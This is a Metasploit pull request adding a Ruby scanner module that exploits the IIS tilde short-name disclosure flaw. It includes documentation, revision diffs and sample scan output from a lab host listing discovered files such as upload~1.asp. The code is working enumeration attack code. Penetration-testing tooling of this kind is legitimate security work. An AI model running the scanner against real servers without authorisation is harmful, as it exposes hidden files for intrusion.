### PR TITLE
Add IIS ShortName Scanner module

### DIFF
--- a/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
@@ -60,4 +60,4 @@ Create registry key NtfsDisable8dot3NameCreation at HKLM\SYSTEM\CurrentControlSe
 ## References
 
     https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
-    https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability
+  * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

--- a/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
@@ -1,0 +1,67 @@
+
+## Microsoft IIS shortname vulnerability scanner
+
+The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). This is a new technique for an existing bug (CVE-2009-4444), which relied on the use of the ;(semicolon) character. Soroush Dalili discovered the original bug, while the new ~ technique was discovered by Soroush Dalili and Ali Abbasnejad. 
+
+
+## Vulnerable Application
+
+Older Microsoft IIS installations are vulnerable with GET, newer installations with OPTIONS
+  
+  
+## Verification Steps
+
+  Example steps in this format (is also in the PR):
+
+  1. Install IIS (default installations are vulnerable)
+  2. Start msfconsole
+  3. Check:
+  
+  ```
+  msf > use auxiliary/scanner/http/iis_shortname_scanner
+  msf auxiliary(iis_shortname_scanner) > set 172.16.249.128
+  msf auxiliary(iis_shortname_scanner) > check
+  [+] 172.16.249.128:80 The target is vulnerable.
+  ```
+
+  4. Scan:
+  
+  ```
+  msf auxiliary(iis_shortname_scanner) > run
+  [*] Scanning in progress...
+  [+] Directories found
+  http://172.16.249.128/aspnet~1
+  http://172.16.249.128/secret~1
+  [+] Files found
+  http://172.16.249.128/web~1.con
+  http://172.16.249.128/index~1.htm
+  http://172.16.249.128/upload~1.asp
+  http://172.16.249.128/upload~2.asp
+  [*] Auxiliary module execution completed
+  ```
+
+## Options
+
+```
+  Module options (auxiliary/scanner/http/iis_shortname_scanner):
+
+  Name     Current Setting  Required  Description
+  ----     ---------------  --------  -----------
+  PATH     /                yes       The base path to start scanning from
+  Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+  RHOST                     yes       The target address
+  RPORT    80               yes       The target port (TCP)
+  SSL      false            no        Negotiate SSL/TLS for outgoing connections
+  VHOST                     no        HTTP server virtual host
+```
+
+## Remediation
+
+Create registry key NtfsDisable8dot3NameCreation at HKLM\SYSTEM\CurrentControlSet\Control\FileSystem, with a value of 1
+
+
+## References
+
+    CVE-2009-4444
+    https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
+    https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

--- a/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
@@ -54,7 +54,7 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
 
 ## Remediation
 
-Create registry key NtfsDisable8dot3NameCreation at HKLM\SYSTEM\CurrentControlSet\Control\FileSystem, with a value of 1
+Create registry key `NtfsDisable8dot3NameCreation` at `HKLM\SYSTEM\CurrentControlSet\Control\FileSystem`, with a value of `1`
 
 
 ## References

--- a/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
@@ -59,5 +59,5 @@ Create registry key NtfsDisable8dot3NameCreation at HKLM\SYSTEM\CurrentControlSe
 
 ## References
 
-    https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
+  * https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
   * https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

--- a/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
@@ -1,8 +1,7 @@
 
 ## Microsoft IIS shortname vulnerability scanner
 
-The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). This is a new technique for an existing bug (CVE-2009-4444), which relied on the use of the ;(semicolon) character. Soroush Dalili discovered the original bug, while the new ~ technique was discovered by Soroush Dalili and Ali Abbasnejad. 
-
+The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
 
 ## Vulnerable Application
 
@@ -60,6 +59,5 @@ Create registry key NtfsDisable8dot3NameCreation at HKLM\SYSTEM\CurrentControlSe
 
 ## References
 
-    CVE-2009-4444
     https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/
     https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability

--- a/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
@@ -11,8 +11,6 @@ Older Microsoft IIS installations are vulnerable with GET, newer installations w
   
 ## Verification Steps
 
-  Example steps in this format (is also in the PR):
-
   1. Install IIS (default installations are vulnerable)
   2. Start msfconsole
   3. Check:

--- a/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
+++ b/documentation/modules/auxiliary/scanner/http/iis_shortname_scanner.md
@@ -1,7 +1,7 @@
 
 ## Microsoft IIS shortname vulnerability scanner
 
-The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
+The vulnerability is caused by a tilde character `~` in a GET or OPTIONS request, which could allow remote attackers to disclose 8.3 filenames (short names). In 2010, Soroush Dalili and Ali Abbasnejad discovered the original bug (GET request) This was publicly disclosed in 2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
 
 ## Vulnerable Application
 

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -30,7 +30,8 @@ class MetasploitModule < Msf::Auxiliary
         'License'     => MSF_LICENSE,
         'References'     =>
           [
-            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability' ]
+            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability' ],
+            [ 'URL', 'https://support.detectify.com/customer/portal/articles/1711520-microsoft-iis-tilde-vulnerability' ]
           ],
         'Targets' => [[ 'Automatic', {} ]]
       )

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -77,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
         'method' => method
       })
 
-      if res1.code == 404 && res2.code != 404
+      if res1 && res1.code == 404 && res2 && res2.code != 404
         @verb = method
         return true
       end

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -39,7 +39,7 @@ class MetasploitModule < Msf::Auxiliary
     register_options([
       Opt::RPORT(80),
       OptString.new('PATH', [ true, "The base path to start scanning from", "/" ]),
-      OptInt.new('Threads',[ true, "Number of threads to use", 20])
+      OptInt.new('THREADS', [ true, "Number of threads to use", 20])
 
     ])
     @dirs = []

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -78,12 +78,12 @@ class MetasploitModule < Msf::Auxiliary
       end
 
       rescue Rex::ConnectionError
+        vprint_error("Connection failed")
         return Exploit::CheckCode::Unknown
     end
   end
 
   def is_vul
-    begin
       for method in ['GET', 'OPTIONS']
         res1 = send_request_cgi({
           'uri' => normalize_uri(datastore['PATH'], '*~1*'),
@@ -106,8 +106,9 @@ class MetasploitModule < Msf::Auxiliary
       else
         return false
       end
+  rescue Rex::ConnectionError
+    print_bad("Failed to connect to target")
     end
-  end
 
   def get_status(f , digit , match)
     res2 = send_request_cgi({
@@ -232,9 +233,10 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def run
-    if !is_vul
+    unless is_vul
       print_status("Target is not vulnerable, or no shortname scannable files are present.")
       return
+    end
     else
       print_status("Scanning in progress...")
       @threads << Thread.new { reduce }
@@ -254,6 +256,7 @@ class MetasploitModule < Msf::Auxiliary
 
       @threads.each(&:join)
       if @dirs.empty?
+        print_status("No directories were found")
       else
         print_good("Directories found")
         @dirs.each do |x|
@@ -261,6 +264,7 @@ class MetasploitModule < Msf::Auxiliary
         end
       end
       if @files.empty?
+        print_status("No files were found")
       else
         print_good("Files found")
         @files.each do |x|

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -30,7 +30,6 @@ class MetasploitModule < Msf::Auxiliary
         'License'     => MSF_LICENSE,
         'References'     =>
           [
-            [ 'CVE', '2009-4444' ],
             [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/' ]
           ],
         'Targets' => [[ 'Automatic', {} ]]
@@ -55,32 +54,13 @@ class MetasploitModule < Msf::Auxiliary
   end
 
   def check
-    begin
-      for method in ['GET', 'OPTIONS']
-        res1 = send_request_cgi({
-          'uri' => normalize_uri(datastore['PATH'], '*~1*'),
-          'method' => method
-        })
-
-        res2 = send_request_cgi({
-          'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'),
-          'method' => method
-        })
-
-        if res1.code == 404 && res2.code != 404
-          vuln = 1
-        end
-      end
-      if vuln == 1
-        return Exploit::CheckCode::Vulnerable
-      else
-        return Exploit::CheckCode::Safe
-      end
-
-      rescue Rex::ConnectionError
-        vprint_error("Connection failed")
-        return Exploit::CheckCode::Unknown
+    if is_vul
+      return Exploit::CheckCode::Vulnerable
+    else
+      return Exploit::CheckCode::Safe
     end
+  rescue Rex::ConnectionError
+      print_bad("Failed to connect to target")
   end
 
   def is_vul
@@ -96,16 +76,11 @@ class MetasploitModule < Msf::Auxiliary
       })
 
       if res1.code == 404 && res2.code != 404
-        vuln = 1
         @verb = method
-        break
+        return true
       end
     end
-    if vuln == 1
-      return true
-    else
-      return false
-    end
+    return false
   rescue Rex::ConnectionError
     print_bad("Failed to connect to target")
   end

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -17,7 +17,7 @@ class MetasploitModule < Msf::Auxiliary
         'Description' => %q{
          The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which
          could allow remote attackers to diclose 8.3 filenames (short names). In 2010, Soroush Dalili
-	 and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in
+         and Ali Abbasnejad discovered the original bug (GET request). This was publicly disclosed in
          2012. In 2014, Soroush Dalili discovered that newer IIS installations are vulnerable with OPTIONS.
         },
         'Author'         =>

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -30,7 +30,7 @@ class MetasploitModule < Msf::Auxiliary
         'License'     => MSF_LICENSE,
         'References'     =>
           [
-            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/' ]
+            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability' ]
           ],
         'Targets' => [[ 'Automatic', {} ]]
       )

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -237,7 +237,6 @@ class MetasploitModule < Msf::Auxiliary
       print_status("Target is not vulnerable, or no shortname scannable files are present.")
       return
     end
-    else
       print_status("Scanning in progress...")
       @threads << Thread.new { reduce }
       @threads << Thread.new { dup }
@@ -273,7 +272,7 @@ class MetasploitModule < Msf::Auxiliary
       end
     end
   end
-end
+
 
 
 

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -1,0 +1,277 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Auxiliary
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Auxiliary::Report
+  include Rex::Proto::Http
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name'        => 'Microsoft IIS shortname vulnerability scanner',
+        'Description' => %q{
+        'The vulnerability is caused by a tilde character "~" in a GET or OPTIONS request, which
+         could allow remote attackers to diclose 8.3 filenames (short names). This is a new
+         technique for an existing bug (CVE-2009-4444), which relied on the use of the ;(semicolon)
+         character. Soroush Dalili discovered the original bug, while the new ~ technique was
+         discovered by Soroush Dalili and Ali Abbasnejad. Older IIS installations are vulnerable
+         with GET, newer installations with OPTIONS'
+        },
+        'Author'         =>
+          [
+          'MinatoTW <shaks19jais[at]gmail.com>',
+          'egre55 <ianaustin[at]protonmail.com>'
+          ],
+        'License'     => MSF_LICENSE,
+        'References'     =>
+          [
+            [ 'CVE', '2009-4444' ],
+            [ 'URL', 'https://soroush.secproject.com/blog/tag/iis-tilde-vulnerability/' ]
+          ],
+        'Targets' => [[ 'Automatic', {} ]]
+      )
+    )
+
+  register_options([
+          Opt::RPORT(80),
+          OptString.new('PATH', [ true, "The base path to start scanning from", "/" ])
+
+  ])
+  @dirs = []
+  @files = []
+  @threads = []
+  @queue = Queue.new
+  @queue_ext = Queue.new
+  @alpha = 'abcdefghijklmnopqrstuvwxyz0123456789!#$%&\'()-@^_`{}'
+  @found = Array.new
+  @found2 = Array.new
+  @found3 = Array.new
+  @verb = ""
+  end
+
+  def check
+    begin
+      for method in ['GET', 'OPTIONS']
+        res1 = send_request_cgi({
+          'uri' => normalize_uri(datastore['PATH'], '*~1*'),
+          'method' => method
+        })
+
+        res2 = send_request_cgi({
+          'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'),
+          'method' => method
+        })
+
+        if res1.code == 404 && res2.code != 404
+          vuln = 1
+        end
+      end
+      if vuln == 1
+        return Exploit::CheckCode::Vulnerable
+      else
+        return Exploit::CheckCode::Safe
+      end
+
+      rescue Rex::ConnectionError
+        return Exploit::CheckCode::Unknown
+    end
+  end
+
+  def is_vul
+    begin
+      for method in ['GET', 'OPTIONS']
+        res1 = send_request_cgi({
+          'uri' => normalize_uri(datastore['PATH'], '*~1*'),
+          'method' => method
+        })
+
+        res2 = send_request_cgi({
+          'uri' => normalize_uri(datastore['PATH'],'QYKWO*~1*'),
+          'method' => method
+        })
+
+        if res1.code == 404 && res2.code != 404
+          vuln = 1
+          @verb = method
+          break
+        end
+      end
+      if vuln == 1
+        return true
+      else
+        return false
+      end
+    end
+  end
+
+  def get_status(f , digit , match)
+    res2 = send_request_cgi({
+      'uri' => normalize_uri(datastore['PATH'],"#{f}#{match}~#{digit}#{match}"),
+      'method' => @verb
+    })
+    return res2.code
+  end
+
+  def get_incomplete_status(url, match, digit , ext)
+    res2 = send_request_cgi({
+      'uri' => normalize_uri(datastore['PATH'],"#{url}#{match}~#{digit}.#{ext}*"),
+      'method' => @verb
+    })
+    return res2.code
+  end
+
+  def get_complete_status(url, digit , ext)
+    res2 = send_request_cgi({
+      'uri' => normalize_uri(datastore['PATH'],"#{url}*~#{digit}.#{ext}"),
+      'method' => @verb
+    })
+    return res2.code
+  end
+
+  def scanner
+    while !@queue_ext.empty?
+      f = @queue_ext.pop
+      url = f.split(':')[0]
+      ext = f.split(':')[1]
+      status = get_incomplete_status(url, "*" , "1" , ext)
+      if status == 404 && ext.size == 3
+        @found3.each do |x|
+          if get_complete_status(url, x , ext) == 404
+            @files << "#{url}~#{x}.#{ext}"
+          end
+        end
+      elsif status == 404 and ext.size < 4
+        @found3.each do |x|
+          if get_complete_status(url, x , ext) == 404
+            @files << "#{url}~#{x}.#{ext}"
+          end
+        end
+        for c in @found2
+          @queue_ext << (f + c )
+        end
+      else
+      end
+    end
+  end
+
+  def scan
+    while !@queue.empty?
+      url = @queue.pop
+      status = get_status(url , "1" , "*")
+      if url.size == 6 && status == 404
+        @found3.each do |x|
+          if get_status(url , x , "") == 404
+            @dirs << "#{url}~#{x}"
+          end
+        end
+        for ext in @found2
+          @queue_ext << ( url + ':' + ext )
+          @threads << Thread.new { scanner }
+        end
+      elsif status == 404
+        @found3.each do |x|
+          if get_complete_status(url, x , "") == 404
+            @dirs << "#{url}~#{x}"
+            break
+          end
+        end
+        if get_incomplete_status(url, "" , "1" , "") == 404
+          for ext in @found2
+            @queue_ext << ( url + ':' + ext )
+            @threads << Thread.new { scanner }
+          end
+        elsif url.size   < 6
+          for c in @found
+            @queue  <<(url +c)
+          end
+        end
+      end
+    end
+  end
+
+  def reduce
+    for c in @alpha.chars
+      res = send_request_cgi({
+        'uri' => normalize_uri(datastore['PATH'],"*#{c}*~1*"),
+        'method' => @verb
+      })
+      if res.code == 404
+        @found << c
+      end
+    end
+  end
+
+  def ext
+    for c in @alpha.chars
+      res = send_request_cgi({
+        'uri' => normalize_uri(datastore['PATH'],"*~1.*#{c}*"),
+        'method' => @verb
+      })
+      if res.code == 404
+        @found2 << c
+      end
+    end
+  end
+
+  def dup
+    array = [*('1'..'9')]
+    array.each do |c|
+      res = send_request_cgi({
+        'uri' => normalize_uri(datastore['PATH'],"*~#{c}.*"),
+        'method' => @verb
+      })
+      if res.code == 404
+        @found3 << c
+      end
+    end
+  end
+
+  def run
+    if !is_vul
+      print_status("Target is not vulnerable, or no shortname scannable files are present.")
+      return
+    else
+      print_status("Scanning in progress...")
+      @threads << Thread.new { reduce }
+      @threads << Thread.new { dup }
+      @threads << Thread.new { ext }
+      @threads.each(&:join)
+
+      for c in @found
+        @queue << c
+      end
+
+      20.times {
+        @threads << Thread.new { scan }
+      }
+
+      sleep(1) until @queue_ext.empty?
+
+      @threads.each(&:join)
+      if @dirs.empty?
+      else
+        print_good("Directories found")
+        @dirs.each do |x|
+          print_line("http://#{datastore['RHOST']}#{datastore['PATH']}#{x}")
+        end
+      end
+      if @files.empty?
+      else
+        print_good("Files found")
+        @files.each do |x|
+          print_line("http://#{datastore['RHOST']}#{datastore['PATH']}#{x}")
+        end
+      end
+    end
+  end
+end
+
+
+
+
+

--- a/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
+++ b/modules/auxiliary/scanner/http/iis_shortname_scanner.rb
@@ -40,7 +40,6 @@ class MetasploitModule < Msf::Auxiliary
       Opt::RPORT(80),
       OptString.new('PATH', [ true, "The base path to start scanning from", "/" ]),
       OptInt.new('THREADS', [ true, "Number of threads to use", 20])
-
     ])
     @dirs = []
     @files = []


### PR DESCRIPTION
Microsoft IIS shortname vulnerability scanner. Uses a tilde character "~" in a GET or OPTIONS request, which could allow remote attackers to diclose 8.3 filenames (short names).

Tested on Windows Server 2008 R2, Windows Server 2016

**Example Output**

```RHOST => 172.16.249.128
msf auxiliary(iis_shortname_scanner) > check
[+] 172.16.249.128:80 The target is vulnerable.
msf auxiliary(iis_shortname_scanner) > run

[*] Scanning in progress...
[+] Directories found
http://172.16.249.128/aspnet~1
http://172.16.249.128/secret~1
[+] Files found
http://172.16.249.128/web~1.con
http://172.16.249.128/index~1.htm
http://172.16.249.128/upload~1.asp
http://172.16.249.128/upload~2.asp
[*] Auxiliary module execution completed
```